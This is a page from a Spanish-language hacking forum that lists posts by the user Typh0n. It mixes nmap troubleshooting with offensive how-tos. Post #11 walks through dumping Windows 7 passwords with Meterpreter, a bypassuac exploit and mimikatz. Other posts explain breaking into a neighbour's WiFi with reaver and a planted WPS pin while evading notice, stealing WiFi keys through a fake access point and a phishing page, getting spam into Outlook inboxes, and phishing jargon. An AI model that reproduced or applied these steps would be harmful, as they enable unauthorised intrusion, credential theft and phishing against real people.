Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - Typh0n

#1
Dudas y pedidos generales / Re:Nmap en VPS
Mayo 03, 2014, 04:18:10 PM
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Lo estas ejecutando como root o como usuario sin permisos? prueba ejecuntandolo con SUDO

Eres dueño del VPS? si es asi verifica iptables.


Saludos.

Gn0m3

Si como root, y he desactivado iptables pero sigue sin funcionar ...  :-\
#2
Exactamente a mi me paso lo mismo con un vecino que cambio la clave, pero antes de eso le active el WPS, y apunte el pin, solo tienes que especificar con el parametro
-p seguido de esto el pin, algo asi.

Código: php
reaver -i mon0 -c 1 -b 00:11:22:33:44:55 -p 12345678 


PD: probablemente se haya dado cuenta que has entrado a su wifi, te recomiendo no usar el DHCP, y tratar de cambiar tu hostname por uno similar a los de android, por ejemplo android-b1490175c84ahb1.

en linux puedes hacerlo en el archivo /etc/hostname, en WinX equipo, propiedades, configuración de nombre y luego en el nombre de la maquina, saludos.
#3
Dudas y pedidos generales / Re:Nmap en VPS
Mayo 02, 2014, 10:04:04 PM
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Hola Typh0n,
Tal y como sugiere el mensaje del nmap, has probado con la opción -Pn??

Código: php
-Pn: Treat all hosts as online -- skip host discovery


Por otro lado incluí por favor la secuencia de opciones / comandos que estas usando Ej:  Nmap -PR 192.168.1.1

Saludos

Gn0m3

Es como si algo bloquease el nmap, no funciona con ninguna opcion ni con un :

Código: php

nmap ip
nmap -sP ip
nmap -Pn ip


Es : Ubuntu 12.04 x86

#4
Buenas acabo de instalar nmap en un vps

y cada vez que quiero escanear una ip me tira el siguiente resultado

Código: php
Starting Nmap 6.25 ( http://nmap.org ) at 2014-05-02 20:50 EDT
Initiating ARP Ping Scan at 20:50
Scanning 190.234.x.x [1 port]
Completed ARP Ping Scan at 20:50, 0.42s elapsed (1 total hosts)
Nmap scan report for 190.234.x.x [host down]
Read data files from: /usr/local/bin/../share/nmap
Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
Nmap done: 1 IP address (0 hosts up) scanned in 0.48 seconds
           Raw packets sent: 2 (56B) | Rcvd: 0 (0B)


A pesar de que "hay ping", recibo este mensaje alguien tiene idea de porque ?

PD: Linux Typh0n 2.6.32-042stab084.20 #1 SMP Mon Jan 27 00:40:08 MSK 2014 i686 i686 i386 GNU/Linux
#5
Dudas y pedidos generales / Re:Archivo Perl Symlink
Mayo 02, 2014, 09:53:03 PM
Si es que se descarga o se muestra, cabe la posibilidad de que no puedas ejecutar este tipo de scripts, el interprete esta en otra ruta, no este instalado etc.
#6
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Hola Typh0n,
Que script estas utilizando? cuéntanos así vemos los parámetros para ver de ayudarte?

Saludos

Gn0m3

Hola estuve probando con sendblaster que es un software para envio de correos, tambien probe con un mailer smtp, pero aun nada, imagino que se debe a la configuracion de ese parametro .
#7
Bueno amigos estoy investigando en esto del "spam" al inbox, en gmail no tengo problemas ya que hasta con un simple script en php llega al inbox, en donde si me parece complicado en en outlook, acabo de conseguir un cpanel donde cree una cuenta de correo para intentar con una cuenta smtp y obtengo el siguiente resultado (código del correo)

Código: php
Authentication-Results: hotmail.com; spf=softfail
X-AUTH-Result: FAIL
X-SID-Result: FAIL


como vi eso de spf, lo active en el cpanel junto con el de domainkeys, y al finalizar se activaron correctamente pero nuevamente me vuelve a aparecer softfail, haber si alguien me da una mano con esto
la ip no esta en listas negras ...

PD: estoy usando sendblaster para los envios de correos con la cuenta smtp ...
#8
No es muy difícil amigo, ahí te envie un MP, si deseas me avisas y te doy una mano  :)
#9
Algunos terminos que se manejan en el mundo del cyber crimen, en cuanto al phishing.

A la pagina clonada se le dice SCAM, al la web donde se alojara se le dice shell o cpanel (solo por el simple hecho de que en la web "hackeada", se obtuvo acceso al cpanel o se subió una web shell), el archivo con el que se envía spam es un mailer y muchas veces solo es cuestión de ver el código del correo para saber de donde vino, y ademas lo mas seguro es que no sea del mismo servidor donde esta alojado el scam, luego tendrías que hacer click para ver a donde seras redireccionado a "www.cualquierweb.com/TUBANCO.COM/DETALLES/CUENTAS/" por ejemplo, si quisieras podrias denunciar el scam o quizas hubiese la posibilidad de obtener acceso al servidor para tratar de localizar los correos a donde llegara los logs bueno eso depende del que audita ..


Saludos
#10
Resulta que me conecto varias red con essid similares vendedor1,vendedor2,vendor3 (todos con la misma contraseña), WPA, y cuando entro al panel del router 192.168.1.1 y veo la parte de wireless veo que tiene un nombre WLAN_XXX por ejemplo y ninguno de los de arriba, ademas con nmap no hay ningun otra ip que pueda ser un router o algo asi, como se maneja este tipo de redes ?


PD: tengo conexion a internet ..
#11
Hacking / Meterpreter + mimikatz
Marzo 05, 2014, 05:52:00 AM

En esta pequeña guía les mostrare como obtener la contraseña de un Windows 7.

Cuando tenemos una sesión con meterpreter y queremos elevar privilegio lo normal es hacer uso de

Código: bash
getsystem
o también

Código: bash
hashdump
pero este ultimo nos arroja los hashes y desencriptarlo puede ser un problema (tiempo).

Si hicieramos uso de getsystem posiblemente obtengamos este error:



Esto es porque para poder ejecutar mimikatz con una shell (cmd), necesitamos privilegios, descargamos No tienes permitido ver los links. Registrarse o Entrar a mi cuenta, lo que no interesa es la aplicacion de 32 bits, dentro del directorio Win32



ya que tratandose de un Windows 7 de 32 bits obviamente haremos uso de ello.

subimos mimikatz.exe con el comando upload



lo siguiente es lanzar una shell

Código: bash
shell


y posteriormente ejecutar mimikatz.exe con los comandos propios de la aplicación.

Código: bash

privilege::debug
sekurlsa::logonPasswords full


Nos saldrá este error esto por el tema de privilegios



Para ello haremos uso de este exploit "exploit/windows/local/bypassuac", pero antes tenemos que enviar la sesion a background con el mismo comando.

Código: bash
background




Luego lanzamos el exploit con la sesion del Windows 7 en este caso la primera

Código: bash

use exploit/windows/local/bypassuac
set SESSION 1
exploit




Luego habremos obtenido una segunda sesión con privilegios de administrador, hacemos uso de ella con

Código: bash
sessions -i 2


nos damos cuenta que tenemos maximos privilegios con el comando

Código: bash
getuid




Finalmente lanzamos la shell y ejecutamos mimikatz.exe



Eso es todo Saludos  :)

#12
Dudas y pedidos generales / Re:ERROR SQLI
Marzo 02, 2014, 05:08:02 AM
me parece que el sitio web tiene un WAF, y esta bloqueando las inyecciones.


Código: php
wafw00f http://www.sitioweb.com


con esa tool te sacaras de dudas (viene en kali linux tb en bakctrack)
#13
Dudas y pedidos generales / Re:Ayuda kali linux
Febrero 28, 2014, 05:39:20 AM
Has instalado Kali en una maquina virtual ?, intenta ejecutar

Código: php
airmong-ng


para ver si te reconoce la tarjeta de red
#14
Excelente manual  ;D
#15
Nadie .... o al menos otra tool aparte de wireshark para capturar todo el trafico algo asi en modo texto y guardarlo en un .cap, para visualizarlo con network-miner
#16
también puedes probar lo de la MAC "invertida"


haces un arp -a

tomas la mac del router

11:22:33:44:55:66

y lo pones de la siguiente manera

221144336655

en caso sea alfanumérica pones todo con mayúscula y sin los ":"

Saludos
#17
Seguridad Wireless / Re:REAVER
Enero 05, 2014, 08:31:32 AM
tengo una duda con reaver, hace un tiempo auditando una red wep, me di con la sopresa con (nmap) que habia una red wpa dentro de la red algo asi..

habian 2 ips


192.168.1.1 (esta te llevaba a una subred y obviamente tenia un panel web del router)
192.168.1.2 (esta era otra subred esta era la WEP y la de arriba la WPA), pero cuando yo me conectaba usaba una ip 192.168.1.x entonces como podia entrar a los 2 paneles invirtiendo la mac me di cuenta que la red wpa era una que siempre quise crackear porque tenia buen alcanze. (no se me ocurría nada) y un día pensando en reaver veía que desde el panel podía generar el WPS entonces genere y lo intente de recuperar con reaver, funciono con el WEP mas no con el WPA se quedaba en una especie de bucle, entonces no todos los routers con wps son vunerables ?  ::)
#18
Hola te digo que es casi imposible crackear wpa, lo que puedes hacer es ver si hay algún conectado desautenticarlo, montar un fake ap y hacer que se conecte al tuyo, luego con ingeniería social hacer una web donde le pidas la clave del wifi y listo.

#19
Bueno amigos muchos hemos visto el post de chema sobre


hackeando-al-vecino-hax0r-que-me-roba-la-wifi

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

en una parte menciona que captura el trafico de la red con airdecrypt en backtrack, hasta ahora no logro dar con el es posible que se haya equivocado de nombre, imagino que es una tool que guarda todo el trafico en un .cap para luego analizarlo ...

Saludos
#20
Excelente, también pueden usar (wget)


wget -r No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


y se descargar la web de forma recursiva saludos ..